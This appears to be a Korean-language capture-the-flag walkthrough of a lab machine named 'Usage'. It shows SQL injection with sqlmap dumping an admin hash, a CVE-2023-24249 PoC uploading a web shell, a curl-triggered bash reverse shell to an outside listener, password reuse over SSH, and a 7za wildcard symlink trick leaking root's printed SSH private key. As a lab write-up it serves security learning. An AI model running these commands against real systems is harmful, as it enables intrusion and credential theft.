Proof of Concept
10.129.14.107
Nmap
PORT STATE SERVICE
22/tcp open ssh
80/tcp open httpInitial Access
80 포트 웹서비스 접속 시 http://usage.htb으로 리다이렉트 됨
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://usage.htb/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel/etc/hosts 파일 수정
┌──(kali㉿kali)-[~/Usage]
└─$ cat /etc/hosts
<SNIP>
10.129.14.107 usage.htbhttp://usage.htb 접속 후 /forget-passwor 엔드포인트 email 파라미터에서 SQL Injection 취약점 발견
- Payload:
email=kalionix@gmail.com' and '1'='2
sqlmap을 사용하여 DB 목록 추출
- information_schema
- performance_schema
- usage_blog
┌──(kali㉿kali)-[~/Usage]
└─$ sudo sqlmap -r request.txt -p email --level=3 --dbs --batch --technique=B --threads=10
<SNIP>
you provided a HTTP Cookie header value, while target URL provides its own cookies within HTTP Set-Cookie header which intersect with yours. Do you want to merge them in further requests? [Y/n] Y
18
[06:53:18] [INFO] retrieved: information_schema
[06:53:18] [INFO] retrieving the length of query output
[06:53:18] [INFO] retrieved: 18
[06:53:56] [INFO] retrieved: performance_schema
[06:53:56] [INFO] retrieving the length of query output
[06:53:56] [INFO] retrieved: 10
[06:54:18] [INFO] retrieved: usage_blog
available databases [3]:
[*] information_schema
[*] performance_schema
[*] usage_blog
[06:54:18] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 162 times
[06:54:18] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/usage.htb'
[*] ending @ 06:54:18 /2026-02-05/usage_blog 데이터베이스 내 테이블 목록 추출
┌──(kali㉿kali)-[~/Usage]
└─$ sudo sqlmap -r request.txt -p email --level=3 -D usage_blog --tables --batch --technique=B --threads=10 -v 0
<SNIP>
Database: usage_blog
[15 tables]
+------------------------+
| admin_menu |
| admin_operation_log |
| admin_permissions |
| admin_role_menu |
| admin_role_permissions |
| admin_role_users |
| admin_roles |
| admin_user_permissions |
| admin_users |
| blog |
| failed_jobs |
| migrations |
| password_reset_tokens |
| personal_access_tokens |
| users |
+------------------------+
admin_users 테이블 덤프하여 관리자 비밀번호 해시 획득
┌──(kali㉿kali)-[~/Usage]
└─$ sudo sqlmap -r request.txt -p email --level=3 -D usage_blog -T admin_users --batch --technique=B --threads=10 -v 0 --dump
___
__H__
___ ___[)]_____ ___ ___ {1.9.12#stable}
|_ -| . [,] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 07:06:08 /2026-02-05/
got a 302 redirect to 'http://usage.htb/forget-password'. Do you want to follow? [Y/n] Y
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [Y/n] Y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: email (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
Payload: _token=IeUU6YdYAotb4xXvIL9RXvbkjp1jQGPif7OSuY5t&email=kalionix@htb.com' AND 3539=(SELECT (CASE WHEN (3539=3539) THEN 3539 ELSE (SELECT 9466 UNION SELECT 9518) END))-- RckG
---
web server operating system: Linux Ubuntu
web application technology: Nginx 1.18.0
back-end DBMS: MySQL < 5.0.12
you provided a HTTP Cookie header value, while target URL provides its own cookies within HTTP Set-Cookie header which intersect with yours. Do you want to merge them in further requests? [Y/n] Y
Database: usage_blog
Table: admin_users
[1 entry]
+----+---------------+---------+--------------------------------------------------------------+----------+---------------------+---------------------+--------------------------------------------------------------+
| id | name | avatar | password | username | created_at | updated_at | remember_token |
+----+---------------+---------+--------------------------------------------------------------+----------+---------------------+---------------------+--------------------------------------------------------------+
| 1 | Administrator | <blank> | $2y$10$ohq2kLpBH/ri.P5wR0P3UOmc24Ydvl9DA9H1S6ooOMgH5xVfUPrL2 | admin | 2023-08-13 02:48:26 | 2023-08-23 06:02:19 | kThXIKu7GhLpgwStz7fCFxjDomCYS1SmPpxwEkzv1Sdzva0qLYaDhllwrsLT |
+----+---------------+---------+--------------------------------------------------------------+----------+---------------------+---------------------+--------------------------------------------------------------+
/etc/hosts에 관리자 도메인 추가 후 관리자 페이지 접속. 이후 이전에 획득한 계정 정보 (admin/whatever1)로 로그인
┌──(kali㉿kali)-[~/Usage]
└─$ cat /etc/hosts
<SNIP>
10.129.14.107 usage.htb admin.usage.htb관리자 패널에서 Laravel 서비스 버전 확인
- Larevel 10.18.0
해당 버전에서 파일 업로드 취약점 발견 (CVE-2023-24249)
POC 다운로드
┌──(kali㉿kali)-[~/Usage]
└─$ git clone https://github.com/ldb33/CVE-2023-24249-PoC.git
Cloning into 'CVE-2023-24249-PoC'...
remote: Enumerating objects: 4, done.
remote: Counting objects: 100% (4/4), done.
remote: Compressing objects: 100% (4/4), done.
remote: Total 4 (delta 0), reused 4 (delta 0), pack-reused 0 (from 0)
Receiving objects: 100% (4/4), done.POC를 실행하여 웹쉘 업로드 성공
┌──(kali㉿kali)-[~/Usage/CVE-2023-24249-PoC]
└─$ python CVE-2023-24249.py
[+] Web shell uploaded to http://admin.usage.htb/uploads/images/shell.php웹쉘을 이용하여 리버스쉘 연결 명령 실행
┌──(kali㉿kali)-[~/Usage/CVE-2023-24249-PoC]
└─$ curl http://admin.usage.htb/uploads/images/shell.php --data-urlencode 'c=bash -c "sh -i >& /dev/tcp/10.10.14.17/4444 0>&1"'리버스쉘 연결 성공
┌──(kali㉿kali)-[~/Usage]
└─$ rlwrap nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.10.14.17] from (UNKNOWN) [10.129.14.107] 56108
sh: 0: can't access tty; job control turned off
$Read user.txt
$ cat user.txt
0baf85aa040a729f07b27184111498fd
$ ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 10.129.14.107 netmask 255.255.0.0 broadcast 10.129.255.255
inet6 fe80::250:56ff:feb0:1ad2 prefixlen 64 scopeid 0x20<link>
inet6 dead:beef::250:56ff:feb0:1ad2 prefixlen 64 scopeid 0x0<global>
ether 00:50:56:b0:1a:d2 txqueuelen 1000 (Ethernet)
RX packets 140926 bytes 34253458 (34.2 MB)
RX errors 0 dropped 1 overruns 0 frame 0
TX packets 99260 bytes 43958330 (43.9 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 454565 bytes 50400087 (50.4 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 454565 bytes 50400087 (50.4 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0Lateral Movoment (auth as xander)
dash 사용자의 홈 디렉토리에 숨겨진 파일들 존재
dash@usage:~$ ls
ls
user.txt
dash@usage:~$ ls -al
ls -al
total 52
drwxr-x--- 6 dash dash 4096 Feb 6 13:36 .
drwxr-xr-x 4 root root 4096 Aug 16 2023 ..
lrwxrwxrwx 1 root root 9 Apr 2 2024 .bash_history -> /dev/null
-rw-r--r-- 1 dash dash 3771 Jan 6 2022 .bashrc
drwx------ 3 dash dash 4096 Aug 7 2023 .cache
drwxrwxr-x 4 dash dash 4096 Aug 20 2023 .config
drwxrwxr-x 3 dash dash 4096 Aug 7 2023 .local
-rw-r--r-- 1 dash dash 32 Oct 26 2023 .monit.id
-rw-r--r-- 1 dash dash 5 Feb 6 13:36 .monit.pid
-rw------- 1 dash dash 1192 Feb 6 13:36 .monit.state
-rwx------ 1 dash dash 707 Oct 26 2023 .monitrc
-rw-r--r-- 1 dash dash 807 Jan 6 2022 .profile
drwx------ 2 dash dash 4096 Aug 24 2023 .ssh
-rw-r----- 1 root dash 33 Feb 6 13:27 user.txt.monitrc 파일에서 비밀번호 발견
3nc0d3d_pa$$w0rd
dash@usage:~$ cat .monitrc
cat .monitrc
#Monitoring Interval in Seconds
set daemon 60
#Enable Web Access
set httpd port 2812
use address 127.0.0.1
allow admin:3nc0d3d_pa$$w0rd
#Apache
check process apache with pidfile "/var/run/apache2/apache2.pid"
if cpu > 80% for 2 cycles then alert
#System Monitoring
check system usage
if memory usage > 80% for 2 cycles then alert
if cpu usage (user) > 70% for 2 cycles then alert
if cpu usage (system) > 30% then alert
if cpu usage (wait) > 20% then alert
if loadavg (1min) > 6 for 2 cycles then alert
if loadavg (5min) > 4 for 2 cycles then alert
if swap usage > 5% then alert
check filesystem rootfs with path /
if space usage > 80% then alert쉘 접근 권한을 가진 사용자 xander 확인
dash@usage:~$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
<SNIP>
xander:x:1001:1001::/home/xander:/bin/bash
clamav:x:115:121::/var/lib/clamav:/bin/false
_laurel:x:998:997::/var/log/laurel:/bin/false이전에 획득한 비밀번호를 이용해 xander 사용자로 SSH 접속 성공
┌──(kali㉿kali)-[~/Usage]
└─$ sshpass -p '3nc0d3d_pa$$w0rd' ssh xander@10.129.14.107
Welcome to Ubuntu 22.04.4 LTS (GNU/Linux 5.15.0-101-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/pro
System information as of Fri Feb 6 01:39:44 PM UTC 2026
System load: 0.265625
Usage of /: 64.9% of 6.53GB
Memory usage: 20%
Swap usage: 0%
Processes: 237
Users logged in: 0
IPv4 address for eth0: 10.129.14.107
IPv6 address for eth0: dead:beef::250:56ff:feb0:a2df
Expanded Security Maintenance for Applications is not enabled.
0 updates can be applied immediately.
Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Fri Feb 6 13:39:47 2026 from 10.10.14.17
xander@usage:~$Privilege Escalation
sudo 권한 확인
- /usr/bin/usage_management 바이너리를 root 권한으로 실행 가능
xander@usage:~$ sudo -l
Matching Defaults entries for xander on usage:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User xander may run the following commands on usage:
(ALL : ALL) NOPASSWD: /usr/bin/usage_management해당 바이너리는 세 가지 기능이 있으며 각각 다음과 같이 동작:
-
- 프로젝트 백업
-
- MySQL 데이터 백업
-
- 관리자 비밀번호 초기화
xander@usage:~$ sudo /usr/bin/usage_management
Choose an option:
1. Project Backup
2. Backup MySQL data
3. Reset admin password
Enter your choice (1/2/3): 1
7-Zip (a) [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,2 CPUs AMD EPYC 7763 64-Core Processor (A00F11),ASM,AES-NI)
Scanning the drive:
2984 folders, 17949 files, 114774052 bytes (110 MiB)
Creating archive: /var/backups/project.zip
Items to compress: 20933
Files read from disk: 17949
Archive size: 54861362 bytes (53 MiB)
Everything is Ok
xander@usage:~$ sudo /usr/bin/usage_management
Choose an option:
1. Project Backup
2. Backup MySQL data
3. Reset admin password
Enter your choice (1/2/3): 2
xander@usage:~$ sudo /usr/bin/usage_management
Choose an option:
4. Project Backup
5. Backup MySQL data
6. Reset admin password
Enter your choice (1/2/3): 3
Password has been reset.Strings로 usage_management 바이너리 파일을 분석해보면, 7za 명령어를 사용하여 /var/www/html 디렉토리 내 모든 파일을 압축하는 것으로 추정 가능
xander@usage:~$ cat usage_management_strings.txt
/lib64/ld-linux-x86-64.so.2
chdir
__cxa_finalize
__libc_start_main
puts
system
__isoc99_scanf
perror
printf
libc.so.6
GLIBC_2.7
GLIBC_2.2.5
GLIBC_2.34
_ITM_deregisterTMCloneTable
__gmon_start__
_ITM_registerTMCloneTable
PTE1
u+UH
/var/www/html
/usr/bin/7za a /var/backups/project.zip -tzip -snl -mmt -- *
<SNIP>7z wildcard 취약점을 이용하여 root의 OPENSSH PRIVATE KEY 획득
xander@usage:~$ cd /var/www/html
xander@usage:/var/www/html$ touch @id_rsa
xander@usage:/var/www/html$ ln -s /root/.ssh/id_rsa id_rsa
xander@usage:/var/www/html$ sudo /usr/bin/usage_management
Choose an option:
1. Project Backup
2. Backup MySQL data
3. Reset admin password
Enter your choice (1/2/3): 1
7-Zip (a) [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,2 CPUs AMD EPYC 7763 64-Core Processor (A00F11),ASM,AES-NI)
Open archive: /var/backups/project.zip
--
Path = /var/backups/project.zip
Type = zip
Physical Size = 54861838
Scanning the drive:
<SNIP>
Files read from disk: 17950
Archive size: 54861979 bytes (53 MiB)
Scan WARNINGS for files and folders:
-----BEGIN OPENSSH PRIVATE KEY----- : No more files
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW : No more files
QyNTUxOQAAACC20mOr6LAHUMxon+edz07Q7B9rH01mXhQyxpqjIa6g3QAAAJAfwyJCH8Mi : No more files
QgAAAAtzc2gtZWQyNTUxOQAAACC20mOr6LAHUMxon+edz07Q7B9rH01mXhQyxpqjIa6g3Q : No more files
AAAEC63P+5DvKwuQtE4YOD4IEeqfSPszxqIL1Wx1IT31xsmrbSY6vosAdQzGif553PTtDs : No more files
H2sfTWZeFDLGmqMhrqDdAAAACnJvb3RAdXNhZ2UBAgM= : No more files
-----END OPENSSH PRIVATE KEY----- : No more files
----------------
Scan WARNINGS: 7획득한 OPENSSH PRIVATE KEY를 이용하여 SSH 접속
┌──(kali㉿kali)-[~/Usage]
└─$ cat id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW
QyNTUxOQAAACC20mOr6LAHUMxon+edz07Q7B9rH01mXhQyxpqjIa6g3QAAAJAfwyJCH8Mi
QgAAAAtzc2gtZWQyNTUxOQAAACC20mOr6LAHUMxon+edz07Q7B9rH01mXhQyxpqjIa6g3Q
AAAEC63P+5DvKwuQtE4YOD4IEeqfSPszxqIL1Wx1IT31xsmrbSY6vosAdQzGif553PTtDs
H2sfTWZeFDLGmqMhrqDdAAAACnJvb3RAdXNhZ2UBAgM=
-----END OPENSSH PRIVATE KEY-----
┌──(kali㉿kali)-[~/Usage]
└─$ ssh root@10.129.14.107 -i id_rsa
Welcome to Ubuntu 22.04.4 LTS (GNU/Linux 5.15.0-101-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/pro
System information as of Fri Feb 6 02:26:30 PM UTC 2026
System load: 0.0390625
Usage of /: 65.7% of 6.53GB
Memory usage: 21%
Swap usage: 0%
Processes: 241
Users logged in: 1
IPv4 address for eth0: 10.129.14.107
IPv6 address for eth0: dead:beef::250:56ff:feb0:a2df
Expanded Security Maintenance for Applications is not enabled.
0 updates can be applied immediately.
Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Mon Apr 8 13:17:47 2024 from 10.10.14.40
root@usage:~#Read root.txt
root@usage:~# cat root.txt
6e50ef4673969d3b69d461280263ecb7
root@usage:~# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 10.129.14.107 netmask 255.255.0.0 broadcast 10.129.255.255
inet6 fe80::250:56ff:feb0:a2df prefixlen 64 scopeid 0x20<link>
inet6 dead:beef::250:56ff:feb0:a2df prefixlen 64 scopeid 0x0<global>
ether 00:50:56:b0:a2:df txqueuelen 1000 (Ethernet)
RX packets 14973 bytes 1055646 (1.0 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 2932 bytes 438852 (438.8 KB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 2365 bytes 264609 (264.6 KB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 2365 bytes 264609 (264.6 KB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0